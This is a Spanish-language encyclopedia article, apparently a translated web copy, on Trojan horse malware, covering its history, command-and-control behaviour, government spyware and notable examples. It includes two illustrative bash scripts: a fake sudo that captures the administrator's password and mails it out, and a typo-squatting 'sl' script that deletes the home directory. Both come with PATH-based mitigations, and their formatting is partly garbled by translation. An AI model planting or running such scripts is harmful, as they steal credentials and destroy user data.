stringtranslate.com

Caballo de Troya (informática)

En informática , un caballo de Troya (o simplemente troyano ) es cualquier malware que engaña a los usuarios sobre su verdadera intención al camuflarse como un programa estándar. El término se deriva de la antigua historia griega del engañoso Caballo de Troya que llevó a la caída de la ciudad de Troya . [1]

Los troyanos se propagan generalmente mediante alguna forma de ingeniería social . Por ejemplo, cuando se engaña a un usuario para que ejecute un archivo adjunto en un correo electrónico disfrazado para parecer inofensivo (por ejemplo, un formulario rutinario que debe completarse) o al hacer clic en un anuncio falso en las redes sociales o en cualquier otro lugar. Aunque su carga útil puede ser cualquier cosa, muchos formularios modernos actúan como una puerta trasera y se ponen en contacto con un controlador que luego puede tener acceso no autorizado al equipo afectado. [2] Los ataques de ransomware a menudo se llevan a cabo mediante un troyano.

A diferencia de los virus y gusanos informáticos , los troyanos generalmente no intentan inyectarse en otros archivos ni propagarse de otro modo. [3]

Uso del término

No está claro dónde o cuándo se utilizó por primera vez el concepto y este término para designarlo, pero en 1971 el primer manual de Unix asumió que sus lectores conocían ambos: [4]

Otra referencia temprana se encuentra en un informe de la Fuerza Aérea de Estados Unidos de 1974 sobre el análisis de la vulnerabilidad en los sistemas informáticos Multics . [5]

Ken Thompson lo popularizó en su discurso de aceptación del premio Turing de 1983 "Reflexiones sobre la confianza", [6] subtitulado: "¿Hasta qué punto se debe confiar en una afirmación de que un programa está libre de troyanos? Quizás sea más importante confiar en las personas que escribieron el software". Mencionó que sabía de la posible existencia de troyanos gracias a un informe sobre la seguridad de Multics. [7] [8]

Comportamiento

Una vez instalados, los troyanos pueden realizar una serie de acciones maliciosas. Muchos tienden a ponerse en contacto con uno o más servidores de Comando y Control (C2) a través de Internet y aguardar instrucciones. Dado que los troyanos individuales suelen utilizar un conjunto específico de puertos para esta comunicación, puede ser relativamente sencillo detectarlos. Además, otro malware podría potencialmente "tomar el control" del troyano, utilizándolo como proxy para acciones maliciosas. [9]

En los países de habla alemana, el software espía utilizado o creado por el gobierno se denomina a veces govware . El govware es, por lo general, un software troyano que se utiliza para interceptar las comunicaciones del equipo de destino. Algunos países, como Suiza y Alemania, tienen un marco legal que rige el uso de este tipo de software. [10] [11] Entre los ejemplos de troyanos govware se incluyen los suizos MiniPanzer y MegaPanzer [12] y el "troyano estatal" alemán apodado R2D2 . [10] El govware alemán funciona explotando las brechas de seguridad desconocidas para el público en general y accediendo a los datos de los teléfonos inteligentes antes de que se encripten a través de otras aplicaciones. [13]

Debido a la popularidad de las botnets entre los hackers y a la disponibilidad de servicios de publicidad que permiten a los autores violar la privacidad de sus usuarios, los troyanos son cada vez más comunes. Según una encuesta realizada por BitDefender entre enero y junio de 2009, "el malware de tipo troyano está en aumento y representa el 83% del malware global detectado en el mundo". Los troyanos tienen una relación con los gusanos, ya que se propagan con la ayuda de los gusanos y viajan a través de Internet con ellos. [14] BitDefender ha declarado que aproximadamente el 15% de los ordenadores son miembros de una botnet, generalmente reclutados por una infección troyana. [15]

Investigaciones recientes han revelado que el método del caballo de Troya se ha utilizado como un ataque a los sistemas de computación en la nube . Un ataque de troyano a los sistemas en la nube intenta insertar una aplicación o servicio en el sistema que puede afectar a los servicios en la nube modificando o deteniendo las funcionalidades. Cuando el sistema en la nube identifica los ataques como legítimos, se ejecuta el servicio o la aplicación que puede dañar e infectar el sistema en la nube. [16]

Ejemplo de sudo en Linux

Un troyano es un programa que pretende realizar alguna función legítima, pero al ejecutarse compromete la seguridad del usuario. [17] Un ejemplo simple es la siguiente versión maliciosa del comando sudo de Linux . Un atacante colocaría este script en un directorio de escritura pública (por ejemplo, /tmp). Si un administrador se encuentra en este directorio y ejecuta sudo, entonces el troyano puede ejecutarse, comprometiendo la contraseña del administrador.

#!/usr/bin/env bash# Desactiva el eco de caracteres en la pantalla. sudo hace esto para evitar que la contraseña del usuario aparezca en la pantalla cuando la escribe.
stty  -echo# Solicitar al usuario la contraseña y luego leer la entrada. Para ocultar la naturaleza de esta versión maliciosa, haga esto 3 veces para imitar el comportamiento de sudo cuando un usuario ingresa la contraseña incorrecta. prompt_count = 1 while [ $prompt_count -le 3 ] ; do echo -n "[sudo] contraseña para $( whoami ) : " read password_input echo sleep 3 # sudo hará una pausa entre solicitudes repetidas prompt_count = $(( prompt_count + 1 )) done                    # Vuelve a activar el eco de caracteres.
stty echo echo $password_input | mail -s " contraseña de $( whoami ) " [email protected]      # Muestra el mensaje de error actual de sudo y luego elimínalo. echo "sudo: 3 intentos de contraseña incorrectos"
rm $0  salida 1 # sudo devuelve 1 con un intento fallido de contraseña  

Para evitar un sudo caballo de Troya , configure la .entrada en la PATHvariable de entorno para que se ubique en el extremo final. [18] Por ejemplo: PATH=/usr/local/bin:/usr/bin:..

Ejemplo de ls en Linux

Tener .algún lugar en el PATH es conveniente, pero hay una trampa. [19] Otro ejemplo es la siguiente versión maliciosa del comando lsls de Linux. Sin embargo, el nombre del archivo no es ; en su lugar, es sl. Un atacante colocaría este script en un directorio de escritura pública (por ejemplo, /tmp).

#!/usr/bin/env bash# Elimina el directorio de inicio del usuario y luego elimínate a ti mismo.
rm  -fr  ~ 2 >/dev/null $0 de
rm 

Para evitar que un programador malintencionado anticipe este error tipográfico común:

  1. omitir .en la RUTA o
  2. alias sl=ls[a]

Ejemplos notables

Privado y gubernamental

Disponible públicamente

Detectado por investigadores de seguridad

Capitalización

El término informático "caballo de Troya" deriva del legendario Caballo de Troya de la antigua ciudad de Troya . Por este motivo, "troyano" suele escribirse con mayúscula. Sin embargo, aunque las guías de estilo y los diccionarios difieren, muchos sugieren escribir "troyano" con minúscula para un uso normal. [30] [31]

Véase también

Referencias

  1. ^ "Definición de Caballo de Troya" . Consultado el 5 de abril de 2012 . Los soldados griegos, incapaces de penetrar las defensas de la ciudad de Troya durante una guerra que duró años, presentaron a la ciudad una ofrenda de paz consistente en un gran caballo de madera.
  2. ^ "Diferencia entre virus, gusanos y troyanos". Symantec Security Center . Broadcom Inc. Archivado desde el original el 19 de agosto de 2013. Consultado el 29 de marzo de 2020 .
  3. ^ "Preguntas frecuentes (FAQ) sobre VIRUS-L/comp.virus v2.00 (Pregunta B3: ¿Qué es un caballo de Troya?)". 9 de octubre de 1995. Archivado desde el original el 5 de agosto de 2020. Consultado el 16 de septiembre de 2019 .
  4. ^ Thompson, Ken; Ritchie, Dennis M. "Unix Programmer's Manual, November 3, 1971" (PDF) . p. 5 . Consultado el 28 de marzo de 2020 . Además, no se puede cambiar el propietario de un archivo con el bit de identificación de usuario activado, de lo contrario se podrían crear caballos de Troya capaces de hacer un mal uso de los archivos de otros.
  5. ^ Karger, PA; Schell, RR, "Multics Security Evaluation: Vulnerability Analysis, ESD-TR-74-193" (PDF) , HQ Electronic Systems Division: Hanscom AFB, MA , II , archivado desde el original (PDF) el 9 de julio de 2011 , consultado el 24 de diciembre de 2017
  6. ^ Ken Thompson (1984). "Reflexión sobre la confianza". Commun. ACM . 27 (8): 761–763. doi : 10.1145/358198.358210 ..
  7. ^ Paul A. Karger; Roger R. Schell (2002), "Treinta años después: lecciones de la evaluación de seguridad de Multics" (PDF) , ACSAC : 119–126
  8. ^ Karger et Schell escribieron que Thompson agregó esta referencia en una versión posterior de su conferencia de Turing: Ken Thompson (noviembre de 1989), "On Trusting Trust.", Unix Review , 7 (11): 70–74
  9. ^ Crapanzano, Jamie (2003). Deconstructing SubSeven, the Trojan Horse of Choice (Informe). SANS Institute . Consultado el 10 de mayo de 2021 .
  10. ^ ab Basil Cupa, Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware), LISS 2013, págs. 419-428
  11. ^ "Preguntas frecuentes". Departamento Federal de Justicia y Policía. Archivado desde el original el 6 de mayo de 2013.
  12. ^ Dunn, John (27 de agosto de 2009). «Un programador suizo publica un troyano espía del gobierno». TechWorld . Archivado desde el original el 26 de enero de 2014. Consultado el 10 de enero de 2021 .
  13. ^ "La policía federal alemana utiliza un virus troyano para evadir el cifrado de teléfonos". DW . Consultado el 14 de abril de 2018 .
  14. ^ "La encuesta sobre malware y spam de BitDefender descubre que las amenazas electrónicas se adaptan a las tendencias de comportamiento en línea". BitDefender . Archivado desde el original el 8 de agosto de 2009 . Consultado el 27 de marzo de 2020 .
  15. ^ Datta, Ganesh (7 de agosto de 2014). "¿Qué son los troyanos?". SecurAid . Archivado desde el original el 12 de agosto de 2014. Consultado el 27 de marzo de 2020 .
  16. ^ Kanaker, Hasan; Karim, Nader Abdel; Awwad, Samer AB; Ismail, Nurul HA; Zraqou, Jamal; Ali, Abdulla MF Al (20 de diciembre de 2022). "Detección de infecciones por caballos de Troya en un entorno basado en la nube mediante aprendizaje automático". Revista internacional de tecnologías móviles interactivas . 16 (24): 81–106. doi : 10.3991/ijim.v16i24.35763 . ISSN  1865-7923.
  17. ^ Wood, Patrick H.; Kochan, Stephen G. (1985). Seguridad del sistema UNIX . Hayden Books. pág. 42. ISBN 0-8104-6267-2.
  18. ^ Wood, Patrick H.; Kochan, Stephen G. (1985). Seguridad del sistema UNIX . Hayden Books. pág. 43. ISBN 0-8104-6267-2El troyano mencionado anteriormente solo funciona si la RUTA del usuario está configurada para buscar comandos en el directorio actual antes de buscar en los directorios del sistema .
  19. ^ "¿Qué tiene de malo tener '.' en tu $PATH?". Penn Engineering . Consultado el 28 de noviembre de 2023 . [S]i eres un mecanógrafo torpe y algún día escribes "sl -l" en lugar de "ls -l", corres el riesgo de ejecutar "./sl", si es que hay alguno. Algún programador "inteligente" podría anticipar errores de mecanografía comunes y dejar programas con esos nombres dispersos por directorios públicos. Ten cuidado.
  20. ^ Seth, Kulakow (1998). "¿Sigue siendo un caballo de Troya o una herramienta de administración de control remoto válida?" (Informe). SANS Institute . Consultado el 10 de mayo de 2021 .
  21. ^ "Mega-Panzer". SourceForge . 21 de septiembre de 2016.
  22. ^ "Mini-Panzer". SourceForge . 18 de septiembre de 2016.
  23. ^ "¿Qué es el virus Sova?". India Today . 16 de septiembre de 2022.
  24. ^ "Una familia de adware troyanizado abusa del servicio de accesibilidad para instalar cualquier aplicación que quiera – Blog de Lookout".
  25. ^ Neal, Dave (20 de noviembre de 2015). "El adware troyano Shedun está atacando el Servicio de Accesibilidad de Android". The Inquirer . Incisive Business Media. Archivado desde el original el 22 de noviembre de 2015. Consultado el 27 de marzo de 2020 .{{cite web}}: CS1 maint: unfit URL (link)
  26. ^ "Lookout descubre nuevo adware troyanizado; 20.000 aplicaciones populares atrapadas en el fuego cruzado – Blog de Lookout".
  27. ^ "Los programas maliciosos Shuanet, ShiftyBug y Shedun podrían rootear automáticamente tu dispositivo Android". 5 de noviembre de 2015.
  28. ^ Times, Tech (9 de noviembre de 2015). "Nueva familia de malware para Android prácticamente imposible de eliminar: saluden a Shedun, Shuanet y ShiftyBug".
  29. ^ "El adware para Android puede instalarse incluso cuando los usuarios lo rechazan explícitamente". 19 de noviembre de 2015.
  30. ^ "troyano". Diccionario avanzado Collins . Consultado el 29 de marzo de 2020 .
  31. ^ "caballo de Troya". Guía de estilo de Microsoft . Microsoft . Consultado el 29 de marzo de 2020 .

Notas

  1. ^ Coloque la aliasdeclaración en /etc/profile

Enlaces externos